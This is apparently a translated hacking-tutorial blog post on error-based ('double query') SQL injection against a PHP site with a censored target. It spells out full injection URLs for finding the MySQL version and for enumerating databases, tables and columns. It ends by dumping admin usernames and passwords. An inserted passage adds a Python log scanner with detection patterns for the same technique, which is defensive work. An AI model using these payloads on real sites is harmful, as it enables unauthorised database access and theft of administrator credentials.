Assalamualaikum
Meet me again, this time with a tutorial on double query injection :D
The target is censored, yeah :D
http://janda.com/pro.php?id=8
Add a single quote and look at the error it gives
Then we find the version with this query
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Version: 5.0.96-log
Now find the database
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Result: information_schema
In the +LIMIT+0,1 part we just change the offset, e.g. +LIMIT+1,1, +LIMIT+2,1 and so on
Database: challanich
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Now look for the tables of the challanich database
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Lucky, the word admin shows up right away :D
Table: ch_admin
Same as above, the limit 0,1 can be changed like before
Okay, moving on, now look at the columns of the ch_admin table
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Pay attention to the part in red, yeah
Now we change the limit again
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
So we conclude the important columns are: user and password
Now dump
Look at the part in red
janda/pro.php?id=8+and+(select 1 from(select+count(*),concat((select+concat(user,0x3a,password,0x3a) from ch_admin+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1
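Every query in this tutorial works the same way: the `floor(rand(0)*2)` with `group by` makes MySQL abort with a duplicate-key error, and the error message carries the value selected in the inner `concat(0x7e,0x27,...)`, so each step leaves a 500 response with a very distinctive query string in the web server log. As an added example (not from the original post), the following Python scanner flags those requests in an access log; the sample log lines, the 203.0.113.5 client address and the indicator names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the error-based ("double query") pattern shown in the post, matched
# against the URL-decoded, lowercased, whitespace-collapsed query string.
INDICATORS = {
    "rand_floor_groupby": re.compile(r"floor\(rand\(0\)\*2\).*group by"),  # duplicate-key trigger
    "count_star_subselect": re.compile(r"select count\(\*\)"),
    "schema_enumeration": re.compile(r"information_schema\.(schemata|tables|columns)"),
    "hex_marker_concat": re.compile(r"concat\(0x7e,0x27"),  # the ~' ... '~ delimiters
    "quote_probe": re.compile(r"=\d+'(?:$|&)"),  # the bare single-quote test at the start
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample log (Apache combined format, RFC 5737 placeholder client);
# the three requests mirror the benign page load, the quote probe and the version() query.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /pro.php?id=8 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /pro.php?id=8' HTTP/1.1" 500 412
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 HTTP/1.1" 500 498
"""

def decode_target(target: str) -> str:
    """Normalise a request target so '+', '%20' and tabs all match as a single space."""
    _, _, query = target.partition("?")
    return re.sub(r"\s+", " ", unquote_plus(query).lower())

def classify(query: str) -> tuple[list[str], str]:
    """Return the matched indicator names and a coarse severity for one query string."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
    if "rand_floor_groupby" in hits:
        severity = "high"      # the error-based extraction primitive itself
    elif "schema_enumeration" in hits or "hex_marker_concat" in hits:
        severity = "medium"
    elif hits:
        severity = "low"       # e.g. a lone quote probe, worth correlating with 500s
    else:
        severity = "none"
    return hits, severity

def scan_log(text: str) -> list[dict]:
    """Scan access-log lines and report every request that trips at least one indicator."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits, severity = classify(decode_target(m.group(1)))
        if hits:
            findings.append({"line": line_no, "severity": severity, "indicators": hits})
    return findings
```

Pair the findings with the response status: a run of 500s from one client on a parameter that normally returns 200 is the signature of this technique even when the query string is obfuscated beyond these patterns.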
Okay, that's all, and thank you
Hope it's useful :D